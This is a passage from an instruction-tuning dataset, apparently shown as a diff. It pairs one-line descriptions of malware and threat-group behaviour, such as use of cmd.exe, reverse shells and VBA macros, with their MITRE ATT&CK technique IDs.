threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"LookBack executes the \"\"cmd.exe\"\" command.\"", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound has used the command-line interface.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MirageFox has the capability to execute commands using cmd.exe.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mis-Type has used `cmd.exe` to run commands on a compromised host.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Misdat is capable of providing shell functionality to the attacker to execute commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mivast has the capability to open a remote shell and run basic commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NanoCore can open a remote command-line interface and execute commands. NanoCore uses JavaScript files.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Nebulae can use CMD to execute a process.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OopsIE uses the command prompt to execute commands on the victim's machine.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Orz can execute shell commands. Orz can execute commands with JavaScript.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Out1 can use native command line for execution.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PHOREAL is capable of creating reverse shell.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PLEAD has the ability to execute shell commands on the compromised host.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RTM uses the command line and rundll32.exe to execute.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "S-Type has provided the ability to execute shell commands on a compromised host.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SDBbot has the ability to use the command shell to execute commands on a compromised host.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SNUGRIDE is capable of executing commands and spawning a reverse shell.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SamSam uses custom batch scripts to execute some of its components.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ShimRat can be issued a command shell function from the C2.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TDTESS provides a reverse shell on the victim.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Tarrask may abuse the Windows schtasks command-line tool to create \"\"hidden\"\" scheduled tasks.\"", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Threat Group-3390 has used command-line interfaces for execution.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TrickBot has used macros in Excel documents to download and deploy the malware on the user\u2019s machine.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Turian can create a remote shell and execute commands using cmd.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volgmer can execute commands on the victim's machine.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wiarp creates a backdoor through which remote attackers can open a command line interface.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "cmd is used to execute programs and other actions at the command-line interface.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "hcdLoader provides command-line access to the compromised system.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "httpclient opens cmd.exe on the victim.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "jRAT has command line access.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "njRAT can launch a command shell interface for executing commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "xCaon has a command to start an interactive shell.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CallMe has the capability to create a reverse shell on victims.", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES.", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography\n- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Drovorub can execute arbitrary commands as root on a compromised system.", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Fysbis has the ability to create and execute commands in a remote shell for CLI.", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kobalos can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MacMa can execute supplied shell commands and uses bash scripts to perform additional actions.", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT37 executes shellcode and a VBA script to decode Base64 strings.", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation CuckooBees, the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file.", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.", + "output": "- T1071.003: Application Layer Protocol - Mail Protocols\n- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete has embedded malicious macros within spearphishing attachments to download additional files.", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NanHaiShu executes additional VBScript code on the victim's machine.", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OSX_OCEANLOTUS.D uses Word macros for execution.", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Remexi uses AutoIt and VBS scripts throughout its execution process.", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CoinTicker executes a Python script to download its second stage.", + "output": "- T1059.006: Command and Scripting Interpreter - Python\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in 